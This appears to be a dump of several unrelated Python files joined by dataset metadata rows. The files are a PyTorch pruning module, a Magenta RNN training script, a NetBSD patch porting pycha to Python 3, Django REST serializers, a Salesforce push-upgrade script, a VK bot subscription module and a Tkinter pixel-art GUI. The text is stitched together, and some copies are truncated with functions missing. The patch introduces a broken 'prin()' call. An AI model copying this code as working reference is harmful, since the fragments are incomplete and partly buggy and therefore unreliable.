threshold = torch.sort(torch.abs(X).flatten())[0][int(len(X.flatten()) * t_sparsity.get_epoch_sparsity())]
return (torch.abs(X) > threshold).float()
class PruningAgent(nn.Module):
"""This class augments an existing torch module with callbacks and parameter masks."""
def __init__(self, model, strategy=None, apply_mask=False, ignored_params=[]):
"""You need to pass a module and a constant sparsity strategy.
Args:
model (torch.nn.Module): existing torch module
strategy: the sparisty target strategy
apply_mask (boolean): if this is true a mask will get generated and applied on initialization
ignored_params (list): no pruning gets applied onto the element in the list
"""
super(PruningAgent, self).__init__()
self.model = model
# create a list of parameters to prune
_ignored_params = []
for param in ignored_params:
if isinstance(param, nn.Module):
_ignored_params.extend(list(param.parameters()))
elif isinstance(param, nn.parameter.Parameter):
_ignored_params.append(param)
else:
raise Exception('only parameters and modules are supported in argument ignored_params')
self.to_prune = self.__get_parameters_to_prune(_ignored_params)
# Parameter masks
self.mask = {}
self.masking_fn = masking_fn
if strategy:
if not isinstance(strategy, Constant):
raise Exception('Currently only the constant sparsity strategy is supported.')
self.layer_strategies = self.__init_per_layer_sparsity_strategies(strategy)
self.init_parameter_masks(not apply_mask)
self.__wrap_sub_modules()
def init_parameter_masks(self, initialize_ones=True):
"""Initialize parameter masks.
Args:
initialize_ones (boolean): initialize mask values as 1 (no masking)
"""
for p in self.to_prune:
if initialize_ones:
self.mask[p] = torch.ones(p.size())
else:
self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
p.data = p.data * self.mask[p] # apply mask to corresponding parameter
def __wrap_sub_modules(self):
"""Applies pruning functionality to every parameter of the actual model."""
for param in self.to_prune:
param.register_hook(lambda g, p=param: g * self.mask[p])
# param.register_hook(lambda g, p=param: self._update_parameter_mask(p))
# param.register_hook(lambda g, p=param: self.layer_strategies[p].next_epoch())
def _update_parameter_mask(self, p):
"""Update masks for a parameter p."""
self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
def get_parameter_sparsity(self):
"""Get a list of the sparsity percentages of every model parameter."""
return [calc_parameter_sparsity(p) for p in self.model.parameters()]
| 37.692982
| 110
| 0.643938
|
"""This file contains the implementation for basic pruning operations on arbitrary torch modules."""
import torch
import torch.nn as nn
import copy
from condense.optimizer.sparsity_functions import Constant
def calc_parameter_sparsity(p):
"""Calculates the sparsity percentage of a torch parameter.
Args:
p: torch parameter
Returns: sparsity percentage (as float) with range [0.0, 1.0]
"""
x = torch.sum((torch.flatten(p) == 0).float())
return float(x) / p.numel()
def masking_fn(X, t_sparsity):
"""Default masking function used by the PruningAgent."""
threshold = torch.sort(torch.abs(X).flatten())[0][int(len(X.flatten()) * t_sparsity.get_epoch_sparsity())]
return (torch.abs(X) > threshold).float()
class PruningAgent(nn.Module):
"""This class augments an existing torch module with callbacks and parameter masks."""
def __init__(self, model, strategy=None, apply_mask=False, ignored_params=[]):
"""You need to pass a module and a constant sparsity strategy.
Args:
model (torch.nn.Module): existing torch module
strategy: the sparisty target strategy
apply_mask (boolean): if this is true a mask will get generated and applied on initialization
ignored_params (list): no pruning gets applied onto the element in the list
"""
super(PruningAgent, self).__init__()
self.model = model
# create a list of parameters to prune
_ignored_params = []
for param in ignored_params:
if isinstance(param, nn.Module):
_ignored_params.extend(list(param.parameters()))
elif isinstance(param, nn.parameter.Parameter):
_ignored_params.append(param)
else:
raise Exception('only parameters and modules are supported in argument ignored_params')
self.to_prune = self.__get_parameters_to_prune(_ignored_params)
# Parameter masks
self.mask = {}
self.masking_fn = masking_fn
if strategy:
if not isinstance(strategy, Constant):
raise Exception('Currently only the constant sparsity strategy is supported.')
self.layer_strategies = self.__init_per_layer_sparsity_strategies(strategy)
self.init_parameter_masks(not apply_mask)
self.__wrap_sub_modules()
def __get_parameters_to_prune(self, ignored_params):
params = []
for param in self.model.parameters():
is_ignored = False
for ignored_param in ignored_params:
if param is ignored_param:
is_ignored = True
break
if not is_ignored:
params.append(param)
return params
def __init_per_layer_sparsity_strategies(self, strategy):
strat = {}
for p in self.model.parameters():
strat[p] = copy.deepcopy(strategy)
strat[p].set_base_sparsity(calc_parameter_sparsity(p))
return strat
def init_parameter_masks(self, initialize_ones=True):
"""Initialize parameter masks.
Args:
initialize_ones (boolean): initialize mask values as 1 (no masking)
"""
for p in self.to_prune:
if initialize_ones:
self.mask[p] = torch.ones(p.size())
else:
self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
p.data = p.data * self.mask[p] # apply mask to corresponding parameter
def __wrap_sub_modules(self):
"""Applies pruning functionality to every parameter of the actual model."""
for param in self.to_prune:
param.register_hook(lambda g, p=param: g * self.mask[p])
# param.register_hook(lambda g, p=param: self._update_parameter_mask(p))
# param.register_hook(lambda g, p=param: self.layer_strategies[p].next_epoch())
def _update_parameter_mask(self, p):
"""Update masks for a parameter p."""
self.mask[p] = self.masking_fn(p, self.layer_strategies[p])
def get_parameter_sparsity(self):
"""Get a list of the sparsity percentages of every model parameter."""
return [calc_parameter_sparsity(p) for p in self.model.parameters()]
| 610
| 0
| 54
|
15236d3fea42976c8c2bc779f41faee3462af1ff
| 2,715
|
py
|
Python
|
magenta/models/polyphonic_rnn/polyphonic_rnn_train.py
|
jellysquider/magenta
|
0fc8188870f5d1c988b76dae434b21e58362516c
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/polyphonic_rnn/polyphonic_rnn_train.py
|
jellysquider/magenta
|
0fc8188870f5d1c988b76dae434b21e58362516c
|
[
"Apache-2.0"
] | null | null | null |
magenta/models/polyphonic_rnn/polyphonic_rnn_train.py
|
jellysquider/magenta
|
0fc8188870f5d1c988b76dae434b21e58362516c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train polyphonic RNN."""
import functools
import os
# internal imports
import numpy as np
import tensorflow as tf
from magenta.models.polyphonic_rnn import polyphonic_rnn_graph
from magenta.models.polyphonic_rnn import polyphonic_rnn_lib
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'note_sequence_input', None, 'Polyphonic tfrecord NoteSequence file.')
tf.app.flags.DEFINE_string(
'checkpoint_dir', '/tmp/polyphonic_rnn/checkpoints',
'Path to the directory where checkpoints and summary events will be saved '
'during training')
tf.app.flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '
'or FATAL.')
if __name__ == '__main__':
console_entry_point()
| 31.206897
| 79
| 0.73186
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train polyphonic RNN."""
import functools
import os
# internal imports
import numpy as np
import tensorflow as tf
from magenta.models.polyphonic_rnn import polyphonic_rnn_graph
from magenta.models.polyphonic_rnn import polyphonic_rnn_lib
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string(
'note_sequence_input', None, 'Polyphonic tfrecord NoteSequence file.')
tf.app.flags.DEFINE_string(
'checkpoint_dir', '/tmp/polyphonic_rnn/checkpoints',
'Path to the directory where checkpoints and summary events will be saved '
'during training')
tf.app.flags.DEFINE_string(
'log', 'INFO',
'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '
'or FATAL.')
def _loop(graph, itr, sess, inits=None, do_updates=True):
i_h1 = np.zeros((graph.batch_size, graph.rnn_dim)).astype('float32')
duration_mb, note_mb = next(itr)
x_note_mb = note_mb[:-1]
y_note_mb = note_mb[1:]
x_duration_mb = duration_mb[:-1]
y_duration_mb = duration_mb[1:]
feed = {graph.note_inpt: x_note_mb,
graph.note_target: y_note_mb,
graph.duration_inpt: x_duration_mb,
graph.duration_target: y_duration_mb,
graph.init_h1: i_h1}
if do_updates:
outs = [graph.cost, graph.final_h1, graph.updates]
train_loss, h1_l, _ = sess.run(outs, feed)
else:
outs = [graph.cost, graph.final_h1]
train_loss, h1_l = sess.run(outs, feed)
return train_loss, h1_l
def main(unused_argv):
tf.logging.set_verbosity(FLAGS.log)
checkpoint_dir = os.path.expanduser(FLAGS.checkpoint_dir)
if not os.path.exists(checkpoint_dir):
tf.gfile.MakeDirs(checkpoint_dir)
tf.logging.info('Checkpoint dir: %s', checkpoint_dir)
graph = polyphonic_rnn_graph.Graph(FLAGS.note_sequence_input)
polyphonic_rnn_lib.run_loop(
functools.partial(_loop, graph),
checkpoint_dir,
graph.train_itr,
graph.valid_itr,
n_epochs=graph.num_epochs,
checkpoint_delay=40,
checkpoint_every_n_epochs=5,
skip_minimums=True)
def console_entry_point():
tf.app.run(main)
if __name__ == '__main__':
console_entry_point()
| 1,287
| 0
| 69
|
78621a8e86299831efb7f131bdc74604edf548df
| 1,297
|
py
|
Python
|
source/pkgsrc/graphics/py-pycha/patches/patch-chavier_gui.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1
|
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/graphics/py-pycha/patches/patch-chavier_gui.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/graphics/py-pycha/patches/patch-chavier_gui.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-chavier_gui.py,v 1.1 2020/03/11 20:17:12 wiz Exp $
Convert to python3 syntax.
--- chavier/gui.py.orig 2011-08-08 19:23:18.000000000 +0000
+++ chavier/gui.py
- print 'CHART STATE'
- print '-' * 70
- print 'surface: %d x %d' % (alloc.width, alloc.height)
- print 'area :', self.chart.area
- print
- print 'minxval:', self.chart.minxval
- print 'maxxval:', self.chart.maxxval
- print 'xrange :', self.chart.xrange
- print
- print 'minyval:', self.chart.minyval
- print 'maxyval:', self.chart.maxyval
- print 'yrange :', self.chart.yrange
+ print('CHART STATE')
+ print('-' * 70)
+ print('surface: %d x %d' % (alloc.width, alloc.height))
+ print('area :', self.chart.area)
+ prin()
+ print('minxval:', self.chart.minxval)
+ print('maxxval:', self.chart.maxxval)
+ print('xrange :', self.chart.xrange)
+ print()
+ print('minyval:', self.chart.minyval)
+ print('maxyval:', self.chart.maxyval)
+ print('yrange :', self.chart.yrange)
| 34.131579
| 65
| 0.573631
|
$NetBSD: patch-chavier_gui.py,v 1.1 2020/03/11 20:17:12 wiz Exp $
Convert to python3 syntax.
--- chavier/gui.py.orig 2011-08-08 19:23:18.000000000 +0000
+++ chavier/gui.py
@@ -523,18 +523,18 @@ class GUI(object):
alloc = self.drawing_area.get_allocation()
- print 'CHART STATE'
- print '-' * 70
- print 'surface: %d x %d' % (alloc.width, alloc.height)
- print 'area :', self.chart.area
- print
- print 'minxval:', self.chart.minxval
- print 'maxxval:', self.chart.maxxval
- print 'xrange :', self.chart.xrange
- print
- print 'minyval:', self.chart.minyval
- print 'maxyval:', self.chart.maxyval
- print 'yrange :', self.chart.yrange
+ print('CHART STATE')
+ print('-' * 70)
+ print('surface: %d x %d' % (alloc.width, alloc.height))
+ print('area :', self.chart.area)
+ prin()
+ print('minxval:', self.chart.minxval)
+ print('maxxval:', self.chart.maxxval)
+ print('xrange :', self.chart.xrange)
+ print()
+ print('minyval:', self.chart.minyval)
+ print('maxyval:', self.chart.maxyval)
+ print('yrange :', self.chart.yrange)
def about(self, action=None):
dialog = AboutDialog(self.main_window)
| 56
| 51
| 73
|
36433b1ccbd9a80c18f87b1265e45bc0ae087c57
| 722
|
py
|
Python
|
longclaw/longclaworders/serializers.py
|
Kuntal-KK/longclaw
|
a3493a62937689a15236b2943d19bcf4ec058cd9
|
[
"MIT"
] | 1
|
2021-08-14T13:46:32.000Z
|
2021-08-14T13:46:32.000Z
|
longclaw/longclaworders/serializers.py
|
Kuntal-KK/longclaw
|
a3493a62937689a15236b2943d19bcf4ec058cd9
|
[
"MIT"
] | null | null | null |
longclaw/longclaworders/serializers.py
|
Kuntal-KK/longclaw
|
a3493a62937689a15236b2943d19bcf4ec058cd9
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from longclaw.longclaworders.models import Order, OrderItem
from longclaw.longclawproducts.serializers import ProductVariantSerializer
from longclaw.longclawshipping.serializers import AddressSerializer
| 26.740741
| 74
| 0.759003
|
from rest_framework import serializers
from longclaw.longclaworders.models import Order, OrderItem
from longclaw.longclawproducts.serializers import ProductVariantSerializer
from longclaw.longclawshipping.serializers import AddressSerializer
class OrderItemSerializer(serializers.ModelSerializer):
product = ProductVariantSerializer()
class Meta:
model = OrderItem
fields = "__all__"
class OrderSerializer(serializers.ModelSerializer):
items = OrderItemSerializer(many=True)
shipping_address = AddressSerializer()
total = serializers.SerializerMethodField()
class Meta:
model = Order
fields = "__all__"
def get_total(self, obj):
return obj.total
| 29
| 404
| 46
|
36ee0bbc01ea7f98c4fe146f9be1433586cda037
| 1,884
|
py
|
Python
|
ci/push/schedule_push.py
|
marcalbaladejo/CumulusCI
|
f619d0d984f7bbfa3c6fcd6e33e41e64105cb4f5
|
[
"BSD-3-Clause"
] | 1
|
2018-01-31T11:56:03.000Z
|
2018-01-31T11:56:03.000Z
|
ci/push/schedule_push.py
|
marcalbaladejo/CumulusCI
|
f619d0d984f7bbfa3c6fcd6e33e41e64105cb4f5
|
[
"BSD-3-Clause"
] | null | null | null |
ci/push/schedule_push.py
|
marcalbaladejo/CumulusCI
|
f619d0d984f7bbfa3c6fcd6e33e41e64105cb4f5
|
[
"BSD-3-Clause"
] | 1
|
2016-07-20T12:15:38.000Z
|
2016-07-20T12:15:38.000Z
|
import os
import sys
import csv
import time
from push_api import SalesforcePushApi
# Force UTF8 output
reload(sys)
sys.setdefaultencoding('UTF8')
if __name__ == '__main__':
try:
username = os.environ.get('SF_USERNAME')
password = os.environ.get('SF_PASSWORD')
serverurl = os.environ.get('SF_SERVERURL')
version = os.environ.get('VERSION')
subscribers = os.environ.get('SUBSCRIBERS', None)
subscribers_file = os.environ.get('SUBSCRIBERS_FILE', None)
if not subscribers and not subscribers_file:
raise ValueError('You must provide either the SUBSCRIBERS or SUBSCRIBERS_FILE environment variables')
if subscribers:
orgs = subscribers.split(',')
else:
f_orgs = open(subscribers_file, 'r')
orgs = []
for org in f_orgs:
orgs.append(org.strip())
push_api = SalesforcePushApi(username, password, serverurl)
version = push_api.get_package_version_objs("Id = '%s'" % version, limit=1)[0]
print 'Scheduling push upgrade for %s.%s to %s orgs' % (version.major, version.minor, len(orgs))
request_id = push_api.create_push_request(version, orgs)
print 'Push Request %s is populated, setting status to Pending to start execution' % request_id
if len(orgs) > 1000:
print "Delaying 30 seconds to allow all jobs to initialize..."
time.sleep(30)
print push_api.run_push_request(request_id)
print 'Push Request %s is queued for execution' % request_id
except SystemExit:
sys.exit(1)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print '-'*60
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)
print '-'*60
sys.exit(2)
| 33.642857
| 113
| 0.639597
|
import os
import sys
import csv
import time
from push_api import SalesforcePushApi
# Force UTF8 output
reload(sys)
sys.setdefaultencoding('UTF8')
if __name__ == '__main__':
try:
username = os.environ.get('SF_USERNAME')
password = os.environ.get('SF_PASSWORD')
serverurl = os.environ.get('SF_SERVERURL')
version = os.environ.get('VERSION')
subscribers = os.environ.get('SUBSCRIBERS', None)
subscribers_file = os.environ.get('SUBSCRIBERS_FILE', None)
if not subscribers and not subscribers_file:
raise ValueError('You must provide either the SUBSCRIBERS or SUBSCRIBERS_FILE environment variables')
if subscribers:
orgs = subscribers.split(',')
else:
f_orgs = open(subscribers_file, 'r')
orgs = []
for org in f_orgs:
orgs.append(org.strip())
push_api = SalesforcePushApi(username, password, serverurl)
version = push_api.get_package_version_objs("Id = '%s'" % version, limit=1)[0]
print 'Scheduling push upgrade for %s.%s to %s orgs' % (version.major, version.minor, len(orgs))
request_id = push_api.create_push_request(version, orgs)
print 'Push Request %s is populated, setting status to Pending to start execution' % request_id
if len(orgs) > 1000:
print "Delaying 30 seconds to allow all jobs to initialize..."
time.sleep(30)
print push_api.run_push_request(request_id)
print 'Push Request %s is queued for execution' % request_id
except SystemExit:
sys.exit(1)
except:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print '-'*60
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)
print '-'*60
sys.exit(2)
| 0
| 0
| 0
|
9e2f6191d670e4988de60e49d379005e81731fb5
| 1,581
|
py
|
Python
|
pskgu_bot/bots/base/user_settings/subscribtion.py
|
mrgick/pskgu_bot
|
a6252c33b3ca18e6df6e79ed9e9721a766ed1e1f
|
[
"MIT"
] | 14
|
2021-02-26T14:33:35.000Z
|
2021-12-27T09:36:12.000Z
|
pskgu_bot/bots/base/user_settings/subscribtion.py
|
mrgick/pskgu_bot
|
a6252c33b3ca18e6df6e79ed9e9721a766ed1e1f
|
[
"MIT"
] | 1
|
2022-02-05T12:37:21.000Z
|
2022-02-05T12:37:24.000Z
|
pskgu_bot/bots/base/user_settings/subscribtion.py
|
mrgick/pskgu_bot
|
a6252c33b3ca18e6df6e79ed9e9721a766ed1e1f
|
[
"MIT"
] | 2
|
2021-03-05T18:07:39.000Z
|
2021-12-03T00:12:29.000Z
|
from ..messages import (MSG_NO_NAME_GROUP, MSG_NOW_UNSUBCRIBE,
MSG_NO_USER_GROUP, msg_not_found_group_name,
msg_already_subscribed, msg_now_subscribed)
from pskgu_bot.db.services import (find_group_by_name, find_vk_user_by_id,
update_user)
from typing import Optional
async def subcribe(user_id: Optional[str] = None,
group_name: Optional[str] = None,
type_sys: str = "vk") -> str:
"""
Подписывает пользователя на группу.
"""
if group_name is None or user_id is None:
return MSG_NO_NAME_GROUP
group = await find_group_by_name(group_name)
if not group:
return msg_not_found_group_name(group_name)
if type_sys == "vk":
user = await find_vk_user_by_id(user_id)
if user:
if user.group == group_name:
return msg_already_subscribed(group_name)
await update_user(user_id, group_name)
return msg_now_subscribed(group_name)
async def unsubcribe(user_id: Optional[str] = None,
type_sys: str = "vk") -> str:
"""
Отписывает пользователя от группы.
"""
if user_id is None:
return MSG_NO_USER_GROUP
if type_sys == "vk":
user = await find_vk_user_by_id(user_id)
if not user:
return MSG_NO_USER_GROUP
else:
if user.group == "":
return MSG_NO_USER_GROUP
else:
await update_user(user_id, "")
return MSG_NOW_UNSUBCRIBE
| 32.265306
| 74
| 0.605313
|
from ..messages import (MSG_NO_NAME_GROUP, MSG_NOW_UNSUBCRIBE,
MSG_NO_USER_GROUP, msg_not_found_group_name,
msg_already_subscribed, msg_now_subscribed)
from pskgu_bot.db.services import (find_group_by_name, find_vk_user_by_id,
update_user)
from typing import Optional
async def subcribe(user_id: Optional[str] = None,
group_name: Optional[str] = None,
type_sys: str = "vk") -> str:
"""
Подписывает пользователя на группу.
"""
if group_name is None or user_id is None:
return MSG_NO_NAME_GROUP
group = await find_group_by_name(group_name)
if not group:
return msg_not_found_group_name(group_name)
if type_sys == "vk":
user = await find_vk_user_by_id(user_id)
if user:
if user.group == group_name:
return msg_already_subscribed(group_name)
await update_user(user_id, group_name)
return msg_now_subscribed(group_name)
async def unsubcribe(user_id: Optional[str] = None,
type_sys: str = "vk") -> str:
"""
Отписывает пользователя от группы.
"""
if user_id is None:
return MSG_NO_USER_GROUP
if type_sys == "vk":
user = await find_vk_user_by_id(user_id)
if not user:
return MSG_NO_USER_GROUP
else:
if user.group == "":
return MSG_NO_USER_GROUP
else:
await update_user(user_id, "")
return MSG_NOW_UNSUBCRIBE
| 0
| 0
| 0
|
e1f3eb9090ef74e2bd15baffc14d784859c6b703
| 187
|
py
|
Python
|
network/models/random.py
|
matejker/network
|
e2a3f5cb4e351fb682aa1736813cc74bca55c169
|
[
"MIT"
] | 1
|
2020-12-16T18:33:59.000Z
|
2020-12-16T18:33:59.000Z
|
network/models/random.py
|
matejker/network
|
e2a3f5cb4e351fb682aa1736813cc74bca55c169
|
[
"MIT"
] | 4
|
2020-06-17T08:14:23.000Z
|
2020-06-18T22:31:47.000Z
|
network/models/random.py
|
matejker/network
|
e2a3f5cb4e351fb682aa1736813cc74bca55c169
|
[
"MIT"
] | 1
|
2021-05-30T22:55:27.000Z
|
2021-05-30T22:55:27.000Z
|
# from network.models.exceptions import *
# from network.network import Network
# from network.models.tools import random_choice
# from itertools import combinations
# import numpy as np
| 31.166667
| 48
| 0.807487
|
# from network.models.exceptions import *
# from network.network import Network
# from network.models.tools import random_choice
# from itertools import combinations
# import numpy as np
| 0
| 0
| 0
|
105056080a2b5617ca7317b4dea241a923e78797
| 35
|
py
|
Python
|
Tests/Runnable1/r_pyclass_t.py
|
jwilk/Pyrex
|
83dfbae1261788933472e3f9c501ad74c61a37c5
|
[
"Apache-2.0"
] | 5
|
2019-05-26T20:48:36.000Z
|
2021-07-09T01:38:38.000Z
|
Tests/Runnable1/r_pyclass_t.py
|
jwilk/Pyrex
|
83dfbae1261788933472e3f9c501ad74c61a37c5
|
[
"Apache-2.0"
] | null | null | null |
Tests/Runnable1/r_pyclass_t.py
|
jwilk/Pyrex
|
83dfbae1261788933472e3f9c501ad74c61a37c5
|
[
"Apache-2.0"
] | 1
|
2022-02-10T07:14:58.000Z
|
2022-02-10T07:14:58.000Z
|
import r_pyclass
r_pyclass.order()
| 11.666667
| 17
| 0.828571
|
import r_pyclass
r_pyclass.order()
| 0
| 0
| 0
|
f208c87d20c028b36a883e09891dfc58b7c86336
| 27,334
|
py
|
Python
|
PixelGUI.py
|
ZachJW34/PixelGUI319k
|
f76c5a7bf6909662b609b7c8bf626a94bff980ad
|
[
"MIT"
] | 1
|
2021-07-27T19:12:14.000Z
|
2021-07-27T19:12:14.000Z
|
PixelGUI.py
|
ZachJW34/PixelGUI319k
|
f76c5a7bf6909662b609b7c8bf626a94bff980ad
|
[
"MIT"
] | null | null | null |
PixelGUI.py
|
ZachJW34/PixelGUI319k
|
f76c5a7bf6909662b609b7c8bf626a94bff980ad
|
[
"MIT"
] | null | null | null |
#Developed by Zachary Williams
from tkinter import *
from functools import partial
from PIL import Image
import sys
from sys import platform
root = Tk()
z = mainclass(root)
root.mainloop()
sys.exit()
| 52.870406
| 181
| 0.57412
|
#Developed by Zachary Williams
from tkinter import *
from functools import partial
from PIL import Image
import sys
from sys import platform
class mainclass(object):
colorfillvar = 0
gridwidth = 8
gridheight = 8
griddim = gridwidth * gridheight
colors = []
basecolor = "red"
picname = []
if platform == "linux" or platform == "linux2":
buttonw = 2
buttonh = 2
toolbarw = 370
toolbarh= 10
elif platform == "darwin":
buttonw = 2
buttonh = 2
elif platform == "win32" or "win64":
buttonw = 2
buttonh = 1
toolbarw = 260
toolbarh = 10
COLORS = ['snow', 'ghost white', 'white smoke', 'gainsboro', 'floral white', 'old lace', 'linen', 'antique white',
'papaya whip', 'blanched almond', 'bisque', 'peach puff', 'navajo white', 'lemon chiffon', 'mint cream',
'azure', 'alice blue', 'lavender', 'lavender blush', 'misty rose', 'dark slate gray', 'dim gray',
'slate gray', 'light slate gray', 'gray', 'light grey', 'midnight blue', 'navy', 'cornflower blue',
'dark slate blue', 'slate blue', 'medium slate blue', 'light slate blue', 'medium blue', 'royal blue',
'blue', 'dodger blue', 'deep sky blue', 'sky blue', 'light sky blue', 'steel blue', 'light steel blue',
'light blue', 'powder blue', 'pale turquoise', 'dark turquoise', 'medium turquoise', 'turquoise', 'cyan',
'light cyan', 'cadet blue', 'medium aquamarine', 'aquamarine', 'dark green', 'dark olive green',
'dark sea green', 'sea green', 'medium sea green', 'light sea green', 'pale green', 'spring green',
'lawn green', 'medium spring green', 'green yellow', 'lime green', 'yellow green', 'forest green',
'olive drab', 'dark khaki', 'khaki', 'pale goldenrod', 'light goldenrod yellow', 'light yellow', 'yellow',
'gold', 'light goldenrod', 'goldenrod', 'dark goldenrod', 'rosy brown', 'indian red', 'saddle brown',
'sandy brown', 'dark salmon', 'salmon', 'light salmon', 'orange', 'dark orange', 'coral', 'light coral',
'tomato', 'orange red', 'red', 'hot pink', 'deep pink', 'pink', 'light pink', 'pale violet red', 'maroon',
'medium violet red', 'violet red', 'medium orchid', 'dark orchid', 'dark violet', 'blue violet', 'purple',
'medium purple', 'thistle', 'snow2', 'snow3', 'snow4', 'seashell2', 'seashell3', 'seashell4',
'AntiqueWhite1', 'AntiqueWhite2', 'AntiqueWhite3', 'AntiqueWhite4', 'bisque2', 'bisque3', 'bisque4',
'PeachPuff2', 'PeachPuff3', 'PeachPuff4', 'NavajoWhite2', 'NavajoWhite3', 'NavajoWhite4', 'LemonChiffon2',
'LemonChiffon3', 'LemonChiffon4', 'cornsilk2', 'cornsilk3', 'cornsilk4', 'ivory2', 'ivory3', 'ivory4',
'honeydew2', 'honeydew3', 'honeydew4', 'LavenderBlush2', 'LavenderBlush3', 'LavenderBlush4', 'MistyRose2',
'MistyRose3', 'MistyRose4', 'azure2', 'azure3', 'azure4', 'SlateBlue1', 'SlateBlue2', 'SlateBlue3',
'SlateBlue4', 'RoyalBlue1', 'RoyalBlue2', 'RoyalBlue3', 'RoyalBlue4', 'blue2', 'blue4', 'DodgerBlue2',
'DodgerBlue3', 'DodgerBlue4', 'SteelBlue1', 'SteelBlue2', 'SteelBlue3', 'SteelBlue4', 'DeepSkyBlue2',
'DeepSkyBlue3', 'DeepSkyBlue4', 'SkyBlue1', 'SkyBlue2', 'SkyBlue3', 'SkyBlue4', 'LightSkyBlue1',
'LightSkyBlue2', 'LightSkyBlue3', 'LightSkyBlue4', 'SlateGray1', 'SlateGray2', 'SlateGray3', 'SlateGray4',
'LightSteelBlue1', 'LightSteelBlue2', 'LightSteelBlue3', 'LightSteelBlue4', 'LightBlue1', 'LightBlue2',
'LightBlue3', 'LightBlue4', 'LightCyan2', 'LightCyan3', 'LightCyan4', 'PaleTurquoise1', 'PaleTurquoise2',
'PaleTurquoise3', 'PaleTurquoise4', 'CadetBlue1', 'CadetBlue2', 'CadetBlue3', 'CadetBlue4', 'turquoise1',
'turquoise2', 'turquoise3', 'turquoise4', 'cyan2', 'cyan3', 'cyan4', 'DarkSlateGray1', 'DarkSlateGray2',
'DarkSlateGray3', 'DarkSlateGray4', 'aquamarine2', 'aquamarine4', 'DarkSeaGreen1', 'DarkSeaGreen2',
'DarkSeaGreen3', 'DarkSeaGreen4', 'SeaGreen1', 'SeaGreen2', 'SeaGreen3', 'PaleGreen1', 'PaleGreen2',
'PaleGreen3', 'PaleGreen4', 'SpringGreen2', 'SpringGreen3', 'SpringGreen4', 'green2', 'green3', 'green4',
'chartreuse2', 'chartreuse3', 'chartreuse4', 'OliveDrab1', 'OliveDrab2', 'OliveDrab4', 'DarkOliveGreen1',
'DarkOliveGreen2', 'DarkOliveGreen3', 'DarkOliveGreen4', 'khaki1', 'khaki2', 'khaki3', 'khaki4',
'LightGoldenrod1', 'LightGoldenrod2', 'LightGoldenrod3', 'LightGoldenrod4', 'LightYellow2',
'LightYellow3', 'LightYellow4', 'yellow2', 'yellow3', 'yellow4', 'gold2', 'gold3', 'gold4', 'goldenrod1',
'goldenrod2', 'goldenrod3', 'goldenrod4', 'DarkGoldenrod1', 'DarkGoldenrod2', 'DarkGoldenrod3',
'DarkGoldenrod4', 'RosyBrown1', 'RosyBrown2', 'RosyBrown3', 'RosyBrown4', 'IndianRed1', 'IndianRed2',
'IndianRed3', 'IndianRed4', 'sienna1', 'sienna2', 'sienna3', 'sienna4', 'burlywood1', 'burlywood2',
'burlywood3', 'burlywood4', 'wheat1', 'wheat2', 'wheat3', 'wheat4', 'tan1', 'tan2', 'tan4', 'chocolate1',
'chocolate2', 'chocolate3', 'firebrick1', 'firebrick2', 'firebrick3', 'firebrick4', 'brown1', 'brown2',
'brown3', 'brown4', 'salmon1', 'salmon2', 'salmon3', 'salmon4', 'LightSalmon2', 'LightSalmon3',
'LightSalmon4', 'orange2', 'orange3', 'orange4', 'DarkOrange1', 'DarkOrange2', 'DarkOrange3',
'DarkOrange4', 'coral1', 'coral2', 'coral3', 'coral4', 'tomato2', 'tomato3', 'tomato4', 'OrangeRed2',
'OrangeRed3', 'OrangeRed4', 'red2', 'red3', 'red4', 'DeepPink2', 'DeepPink3', 'DeepPink4', 'HotPink1',
'HotPink2', 'HotPink3', 'HotPink4', 'pink1', 'pink2', 'pink3', 'pink4', 'LightPink1', 'LightPink2',
'LightPink3', 'LightPink4', 'PaleVioletRed1', 'PaleVioletRed2', 'PaleVioletRed3', 'PaleVioletRed4',
'maroon1', 'maroon2', 'maroon3', 'maroon4', 'VioletRed1', 'VioletRed2', 'VioletRed3', 'VioletRed4',
'magenta2', 'magenta3', 'magenta4', 'orchid1', 'orchid2', 'orchid3', 'orchid4', 'plum1', 'plum2', 'plum3',
'plum4', 'MediumOrchid1', 'MediumOrchid2', 'MediumOrchid3', 'MediumOrchid4', 'DarkOrchid1', 'DarkOrchid2',
'DarkOrchid3', 'DarkOrchid4', 'purple1', 'purple2', 'purple3', 'purple4', 'MediumPurple1',
'MediumPurple2', 'MediumPurple3', 'MediumPurple4', 'thistle1', 'thistle2', 'thistle3', 'thistle4',
